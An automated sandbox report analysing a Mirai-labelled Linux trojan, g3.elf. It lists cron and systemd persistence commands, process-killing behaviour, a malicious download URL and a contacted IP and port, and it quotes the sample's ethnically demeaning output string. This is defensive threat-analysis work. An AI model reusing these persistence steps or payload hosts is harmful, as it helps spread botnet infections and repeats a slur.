Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g3.elf

Overview

General Information

Sample name:g3.elf
Analysis ID:1589884
MD5:54a27644f1f545399646d19da0345e1d
SHA1:d34d24dd85384e5058ed162ea9af2e1f497f1049
SHA256:773f77b3dec9437e08cf0aff0871b179bef8d08506504a2a282a8353d1581973
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589884
Start date and time:2025-01-13 09:42:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g3.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g3
Command:/tmp/g3.elf
PID:6246
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6217, Parent: 4332)
  • rm (PID: 6217, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.h3frGKTOun /tmp/tmp.jefTPyTfQB /tmp/tmp.tupEN03WGQ
  • dash New Fork (PID: 6218, Parent: 4332)
  • rm (PID: 6218, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.h3frGKTOun /tmp/tmp.jefTPyTfQB /tmp/tmp.tupEN03WGQ
  • g3.elf (PID: 6246, Parent: 6150, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g3.elf
    • g3.elf New Fork (PID: 6257, Parent: 6246)
    • sh (PID: 6257, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 6263, Parent: 6257)
      • systemctl (PID: 6263, Parent: 6257, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g3.elf New Fork (PID: 6277, Parent: 6246)
    • sh (PID: 6277, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 6279, Parent: 6277)
      • systemctl (PID: 6279, Parent: 6277, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • g3.elf New Fork (PID: 6280, Parent: 6246)
    • sh (PID: 6280, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 6285, Parent: 6280)
      • crontab (PID: 6285, Parent: 6280, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g3.elf New Fork (PID: 6286, Parent: 6246)
    • sh (PID: 6286, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 6291, Parent: 6286)
    • g3.elf New Fork (PID: 6292, Parent: 6246)
      • g3.elf New Fork (PID: 6294, Parent: 6292)
        • g3.elf New Fork (PID: 6296, Parent: 6294)
        • g3.elf New Fork (PID: 6297, Parent: 6294)
        • g3.elf New Fork (PID: 6299, Parent: 6294)
  • wrapper-2.0 (PID: 6248, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6249, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6250, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6251, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6252, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6253, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6265, Parent: 6264)
  • snapd-env-generator (PID: 6265, Parent: 6264, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g3.elfReversingLabs: Detection: 26%
Source: global trafficTCP traffic: 192.168.2.23:48834 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.23:53501 -> 1.1.1.1:53
Source: /tmp/g3.elf (PID: 6246)Socket: 127.0.0.1:23476Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g3.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: crontab.tmp.16.dr, hello.16.dr, tmp.tH3Wuq.44.dr, hello.service.16.drString found in binary or memory: http://103.136.41.100/g3
Source: g3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6248, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6249, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6250, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6251, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6252, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6253, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6248, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6249, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6250, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6251, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6252, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 6246)SIGKILL sent: pid: 6253, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6285)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 6285)File: /var/spool/cron/crontabs/tmp.tH3WuqJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6299)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 6257)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g3.elf (PID: 6277)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/g3.elf (PID: 6280)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g3.elf (PID: 6286)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /usr/bin/dash (PID: 6217)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.h3frGKTOun /tmp/tmp.jefTPyTfQB /tmp/tmp.tupEN03WGQJump to behavior
Source: /usr/bin/dash (PID: 6218)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.h3frGKTOun /tmp/tmp.jefTPyTfQB /tmp/tmp.tupEN03WGQJump to behavior
Source: /bin/sh (PID: 6263)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6279)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/g3.elf (PID: 6246)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g3.elf (PID: 6246)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g3.elf (PID: 6246)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g3.elf (PID: 6246)Queries kernel information via 'uname': Jump to behavior
Source: g3.elf, 6246.1.00007ffed3486000.00007ffed34a7000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.NsHhUt:
Source: g3.elf, 6246.1.00007ffed3486000.00007ffed34a7000.rw-.sdmpBinary or memory string: /tmp/qemu-open.NsHhUt
Source: g3.elf, 6246.1.00007ffed3486000.00007ffed34a7000.rw-.sdmp, g3.elf, 6292.1.00007ffed3486000.00007ffed34a7000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/g3.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g3.elf
Source: g3.elf, 6246.1.0000560efe0be000.0000560efe20f000.rw-.sdmp, g3.elf, 6292.1.0000560efe0be000.0000560efe20f000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g3.elf, 6246.1.00007ffed3486000.00007ffed34a7000.rw-.sdmp, g3.elf, 6292.1.00007ffed3486000.00007ffed34a7000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g3.elf, 6246.1.0000560efe0be000.0000560efe20f000.rw-.sdmp, g3.elf, 6292.1.0000560efe0be000.0000560efe20f000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589884 Sample: g3.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 51 109.202.202.202, 80 INIT7CH Switzerland 2->51 53 1.1.1.1, 53, 53501 CLOUDFLARENETUS Australia 2->53 55 3 other IPs or domains 2->55 57 Multi AV Scanner detection for submitted file 2->57 9 dash rm g3.elf 2->9         started        13 dash rm 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 6 other processes 2->17 signatures3 process4 file5 45 /tmp/crontab.tmp, troff 9->45 dropped 47 /etc/init.d/hello, Bourne-Again 9->47 dropped 59 Sample tries to kill multiple processes (SIGKILL) 9->59 61 Drops files in suspicious directories 9->61 19 g3.elf sh 9->19         started        21 g3.elf sh 9->21         started        23 g3.elf sh 9->23         started        25 2 other processes 9->25 signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 sh systemctl 23->33         started        35 g3.elf 25->35         started        37 sh 25->37         started        file9 49 /var/spool/cron/crontabs/tmp.tH3Wuq, troff 27->49 dropped 63 Sample tries to persist itself using cron 27->63 65 Executes the "crontab" command typically for achieving persistence 27->65 39 g3.elf 35->39         started        41 g3.elf 35->41         started        43 g3.elf 35->43         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g3.elf26%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g3100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%sg3.elffalse
    high
    http://1/wget.shg3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpfalse
      high
      http://103.136.41.100/g3crontab.tmp.16.dr, hello.16.dr, tmp.tH3Wuq.44.dr, hello.service.16.drfalse
      • Avira URL Cloud: malware
      unknown
      http://schemas.xmlsoap.org/soap/encoding/g3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpfalse
        high
        http://9/curl.shg3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/g3.elf, 6246.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmp, g3.elf, 6292.1.00007fa1f0033000.00007fa1f0039000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g4.elfGet hashmaliciousUnknownBrowse
              g3.elfGet hashmaliciousUnknownBrowse
                g5.elfGet hashmaliciousUnknownBrowse
                  g4.elfGet hashmaliciousUnknownBrowse
                    g6.elfGet hashmaliciousUnknownBrowse
                      g3.elfGet hashmaliciousUnknownBrowse
                        m1.elfGet hashmaliciousUnknownBrowse
